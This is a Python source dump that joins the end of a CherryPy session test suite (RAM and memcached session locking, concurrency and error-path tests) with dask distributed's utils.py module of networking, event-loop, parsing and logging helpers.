time.sleep(1)
s1.release_lock()
t = threading.Thread(target=lock)
t.start()
start = time.time()
while not sessions.RamSession.locks and time.time() - start < 5:
time.sleep(0.01)
assert len(sessions.RamSession.locks) == 1, 'Lock not acquired'
s2 = sessions.RamSession()
s2.clean_up()
assert len(sessions.RamSession.locks) == 1, 'Clean up should not remove active lock'
t.join()
try:
import memcache # NOQA
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip('memcached not reachable ')
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/set_session_cls/cherrypy.Sessions.MemcachedSession')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody('NotImplementedError')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody('True')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody('done')
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage('/')
self.assertBody('1')
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage('/', cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody('memcached')
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(
404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
utils.py
|
from __future__ import print_function, division, absolute_import
import atexit
from collections import deque
from contextlib import contextmanager
from datetime import timedelta
import functools
from hashlib import md5
import inspect
import json
import logging
import multiprocessing
from numbers import Number
import operator
import os
import re
import shutil
import socket
from time import sleep
from importlib import import_module
import sys
import tempfile
import threading
import warnings
import weakref
import six
import tblib.pickling_support
from .compatibility import cache_from_source, getargspec, invalidate_caches, reload
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import Queue, PY3, PY2, get_thread_identity, unicode
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = '__no_default__'
def _initialize_mp_context():
if PY3 and not sys.platform.startswith('win') and 'PyPy' not in sys.version:
method = dask.config.get('distributed.worker.multiprocessing-method')
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ['distributed']
if 'pkg_resources' in sys.modules:
preload.append('pkg_resources')
ctx.set_forkserver_preload(preload)
else:
ctx = multiprocessing
return ctx
mp_context = _initialize_mp_context()
def funcname(func):
"""Get the name of a function."""
while hasattr(func, 'func'):
func = func.func
try:
return func.__name__
except AttributeError:
return str(func)
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in getargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family, default):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
# XXX Should first try getaddrinfo() on socket.gethostname() and getfqdn()
warnings.warn("Couldn't detect a suitable IP address for "
"reaching %r, defaulting to %r: %s"
% (host, default, e), RuntimeWarning)
return default
finally:
sock.close()
def get_ip(host='8.8.8.8', port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET, default='127.0.0.1')
def get_ipv6(host='2001:4860:4860::8888', port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6, default='::1')
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
for info in psutil.net_if_addrs()[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
@gen.coroutine
def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
raise gen.Return(results)
@gen.coroutine
def Any(args, quiet_exceptions=()):
""" Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*args)
results = [None for _ in args]
while not tasks.done():
try:
result = yield tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
raise gen.Return(results)
def sync(loop, func, *args, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and ((isinstance(loop, PollIOLoop) and getattr(loop, '_closing', False)) or
(hasattr(loop, 'asyncio_loop') and loop.asyncio_loop._closed)):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
timeout = kwargs.pop('callback_timeout', None)
e = threading.Event()
main_tid = get_thread_identity()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == get_thread_identity():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if timeout is not None:
future = gen.with_timeout(timedelta(seconds=timeout), future)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if timeout is not None:
if not e.wait(timeout):
raise gen.TimeoutError("timed out after %s s." % (timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
six.reraise(*error[0])
else:
return result[0]
class LoopRunner(object):
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if (self._asynchronous or real_runner is not None or count > 0):
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(start_exc[0], Exception): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with ignoring(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, 'w') as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if 'IPython' not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), 'kernel', None) is not None
hex_pattern = re.compile('[a-f]+')
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split('-')
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (len(word) == 8 and
hex_pattern.match(word) is not None):
result += '-' + word
else:
break
if len(result) == 32 and re.match(r'[a-f0-9]{32}', result):
return 'data'
else:
if result[0] == '<':
result = result.strip('<>').split()[0].split('.')[-1]
return result
except Exception:
return 'Other'
try:
from functools import lru_cache
except ImportError:
lru_cache = False
pass
else:
key_split = lru_cache(100000)(key_split)
if PY3:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
elif typ is bytes:
return key_split_group(x.decode())
else:
return 'Other'
else:
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group('x')
'x'
>>> key_split_group('x-1')
'x-1'
>>> key_split_group('x-1-2-3')
'x-1-2-3'
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('hello-world-1')
'hello-world-1'
>>> key_split_group(b'hello-world-1')
'hello-world-1'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group(None)
'Other'
>>> key_split_group('x-abcdefab') # ignores hex
'x-abcdefab'
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str or typ is unicode:
if x[0] == '(':
return x.split(',', 1)[0].strip('()"\'')
elif len(x) == 32 and re.match(r'[a-f0-9]{32}', x):
return 'data'
elif x[0] == '<':
return x.strip('<>').split()[0].split('.')[-1]
else:
return x
else:
return 'Other'
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root='distributed'):
"""
Force all existing loggers below *root* to the given level at least
(or keep the existing level if less verbose).
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(hostname,
1234, # dummy port number
fam, socket.SOCK_STREAM)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [os.path.join('distributed', 'worker'),
os.path.join('distributed', 'scheduler'),
os.path.join('tornado', 'gen.py'),
os.path.join('concurrent', 'futures')]
while exc_traceback and any(b in exc_traceback.tb_frame.f_code.co_filename
for b in bad):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message",
str(e)[:n])
except Exception:
return Exception("Long error message",
type(e),
str(e)[:n])
else:
return e
if sys.version_info >= (3,):
# (re-)raising StopIteration is deprecated in 3.6+
exec("""def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
return result.value
yield result
""")
else:
# Returning non-None from generator is a syntax error in 2.x
def queue_to_iterator(q):
while True:
result = q.get()
if isinstance(result, StopIteration):
raise result
yield result
def _dump_to_queue(seq, q):
for item in seq:
q.put(item)
def iterator_to_queue(seq, maxsize=0):
q = Queue(maxsize=maxsize)
t = threading.Thread(target=_dump_to_queue, args=(seq, q))
t.daemon = True
t.start()
return q
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is unicode or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not unicode and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)"
% (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (istask(task) or
type(task) is list and any(map(_maybe_complex, task)) or
type(task) is dict and any(map(_maybe_complex, task.values())))
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b''
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter):]
def read_block(f, offset, length, delimiter=None):
""" Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
@contextmanager
def tmpfile(extension=''):
extension = '.' + extension.lstrip('.')
handle, filename = tempfile.mkstemp(extension)
os.close(handle)
os.remove(filename)
yield filename
if os.path.exists(filename):
if os.path.isdir(filename):
shutil.rmtree(filename)
else:
try:
os.remove(filename)
except OSError: # sometimes we can't remove a generated temp file
pass
def ensure_bytes(s):
""" Turn string or bytes to bytes
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
if isinstance(s, memoryview):
return s.tobytes()
if isinstance(s, bytearray) or PY2 and isinstance(s, buffer): # noqa: F821
return bytes(s)
if hasattr(s, 'encode'):
return s.encode()
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s)
def divide_n_among_bins(n, bins):
"""
>>> divide_n_among_bins(12, [1, 1])
[6, 6]
>>> divide_n_among_bins(12, [1, 2])
[4, 8]
>>> divide_n_among_bins(12, [1, 2, 1])
[3, 6, 3]
>>> divide_n_among_bins(11, [1, 2, 1])
[2, 6, 3]
>>> divide_n_among_bins(11, [.1, .2, .1])
[2, 6, 3]
"""
total = sum(bins)
acc = 0.0
out = []
for b in bins:
now = n / total * b + acc
now, acc = divmod(now, 1)
out.append(int(now))
return out
def mean(seq):
seq = list(seq)
return sum(seq) / len(seq)
if hasattr(sys, "is_finalizing"):
def shutting_down(is_finalizing=sys.is_finalizing):
return is_finalizing()
else:
_shutting_down = [False]
def _at_shutdown(l=_shutting_down):
l[0] = True
def shutting_down(l=_shutting_down):
return l[0]
atexit.register(_at_shutdown)
shutting_down.__doc__ = """
Whether the interpreter is currently shutting down.
For use in finalizers, __del__ methods, and similar; it is advised
to early bind this function rather than look it up when calling it,
since at shutdown module globals may be cleared.
"""
def open_port(host=''):
""" Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path):
""" Loads modules for a file (.py, .zip, .egg) """
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import = []
tmp_python_path = None
if ext in ('.py',): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == '.py': # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with ignoring(OSError):
os.remove(cache_file)
if ext in ('.egg', '.zip', '.pyz'):
if path not in sys.path:
sys.path.insert(0, path)
if ext == '.egg':
import pkg_resources
pkgs = pkg_resources.find_distributions(path)
for pkg in pkgs:
names_to_import.append(pkg.project_name)
elif ext in ('.zip', '.pyz'):
names_to_import.append(name)
loaded = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(reload(import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
class itemgetter(object):
"""A picklable itemgetter.
Examples
--------
>>> data = [0, 1, 2]
>>> get_1 = itemgetter(1)
>>> get_1(data)
1
"""
__slots__ = ('index',)
def __init__(self, index):
self.index = index
def __call__(self, x):
return x[self.index]
def __reduce__(self):
return (itemgetter, (self.index,))
def format_bytes(n):
""" Format bytes as text
>>> format_bytes(1)
'1 B'
>>> format_bytes(1234)
'1.23 kB'
>>> format_bytes(12345678)
'12.35 MB'
>>> format_bytes(1234567890)
'1.23 GB'
>>> format_bytes(1234567890000)
'1.23 TB'
>>> format_bytes(1234567890000000)
'1.23 PB'
"""
if n > 1e15:
return '%0.2f PB' % (n / 1e15)
if n > 1e12:
return '%0.2f TB' % (n / 1e12)
if n > 1e9:
return '%0.2f GB' % (n / 1e9)
if n > 1e6:
return '%0.2f MB' % (n / 1e6)
if n > 1e3:
return '%0.2f kB' % (n / 1000)
return '%d B' % n
byte_sizes = {
'kB': 10**3,
'MB': 10**6,
'GB': 10**9,
'TB': 10**12,
'PB': 10**15,
'KiB': 2**10,
'MiB': 2**20,
'GiB': 2**30,
'TiB': 2**40,
'PiB': 2**50,
'B': 1,
'': 1,
}
byte_sizes = {k.lower(): v for k, v in byte_sizes.items()}
byte_sizes.update({k[0]: v for k, v in byte_sizes.items() if k and 'i' not in k})
byte_sizes.update({k[:-1]: v for k, v in byte_sizes.items() if k and 'i' in k})
def parse_bytes(s):
""" Parse byte string to numbers
>>> parse_bytes('100')
100
>>> parse_bytes('100 MB')
100000000
>>> parse_bytes('100M')
100000000
>>> parse_bytes('5kB')
5000
>>> parse_bytes('5.4 kB')
5400
>>> parse_bytes('1kiB')
1024
>>> parse_bytes('1e6')
1000000
>>> parse_bytes('1e6 kB')
1000000000
>>> parse_bytes('MB')
1000000
"""
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:]
n = float(prefix)
multiplier = byte_sizes[suffix.lower()]
result = n * multiplier
return int(result)
timedelta_sizes = {
's': 1,
'ms': 1e-3,
'us': 1e-6,
'ns': 1e-9,
'm': 60,
'h': 3600,
'd': 3600 * 24,
}
tds2 = {
'second': 1,
'minute': 60,
'hour': 60 * 60,
'day': 60 * 60 * 24,
'millisecond': 1e-3,
'microsecond': 1e-6,
'nanosecond': 1e-9,
}
tds2.update({k + 's': v for k, v in tds2.items()})
timedelta_sizes.update(tds2)
timedelta_sizes.update({k.upper(): v for k, v in timedelta_sizes.items()})
def parse_timedelta(s, default='seconds'):
""" Parse timedelta string to number of seconds
Examples
--------
>>> parse_timedelta('3s')
3
>>> parse_timedelta('3.5 seconds')
3.5
>>> parse_timedelta('300ms')
0.3
>>> parse_timedelta(timedelta(seconds=3)) # also supports timedeltas
3
"""
if isinstance(s, timedelta):
return s.total_seconds()
if isinstance(s, Number):
s = str(s)
s = s.replace(' ', '')
if not s[0].isdigit():
s = '1' + s
for i in range(len(s) - 1, -1, -1):
if not s[i].isalpha():
break
index = i + 1
prefix = s[:index]
suffix = s[index:] or default
n = float(prefix)
multiplier = timedelta_sizes[suffix.lower()]
result = n * multiplier
if int(result) == result:
result = int(result)
return result
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c))
for x, c in zip(zip(*rows), columns))
row_template = ('|' + (' %%-%ds |' * len(columns))) % widths
header = row_template % tuple(columns)
bar = '+%s+' % '+'.join('-' * (w + 2) for w in widths)
data = '\n'.join(row_template % r for r in rows)
return '\n'.join([bar, header, bar, data, bar])
if PY2:
def nbytes(frame, _bytes_like=(bytes, bytearray, buffer)): # noqa: F821
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
elif isinstance(frame, memoryview):
if frame.shape is None:
return frame.itemsize
else:
return functools.reduce(operator.mul, frame.shape,
frame.itemsize)
else:
return frame.nbytes
else:
def nbytes(frame, _bytes_like=(bytes, bytearray)):
""" Number of bytes of a frame or memoryview """
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def PeriodicCallback(callback, callback_time, io_loop=None):
"""
Wrapper around tornado.IOLoop.PeriodicCallback, for compatibility
with removal of the `io_loop` parameter in Tornado 5.0.
"""
if tornado.version_info >= (5,):
return tornado.ioloop.PeriodicCallback(callback, callback_time)
else:
return tornado.ioloop.PeriodicCallback(callback, callback_time, io_loop)
@contextmanager
def time_warn(duration, text):
start = time()
yield
end = time()
if end - start > duration:
print('TIME WARNING', text, end - start)
def json_load_robust(fn, load=json.load):
""" Reads a JSON file from disk that may be being written as we read """
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
def format_time(n):
""" format integers as time
>>> format_time(1)
'1.00 s'
>>> format_time(0.001234)
'1.23 ms'
>>> format_time(0.00012345)
'123.45 us'
>>> format_time(123.456)
'123.46 s'
"""
if n >= 1:
return '%.2f s' % n
if n >= 1e-3:
return '%.2f ms' % (n * 1e3)
return '%.2f us' % (n * 1e6)
class DequeHandler(logging.Handler):
""" A logging.Handler that records records into a deque """
_instances = weakref.WeakSet()
def __init__(self, *args, **kwargs):
n = kwargs.pop('n', 10000)
self.deque = deque(maxlen=n)
super(DequeHandler, self).__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
def reset_logger_locks():
""" Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
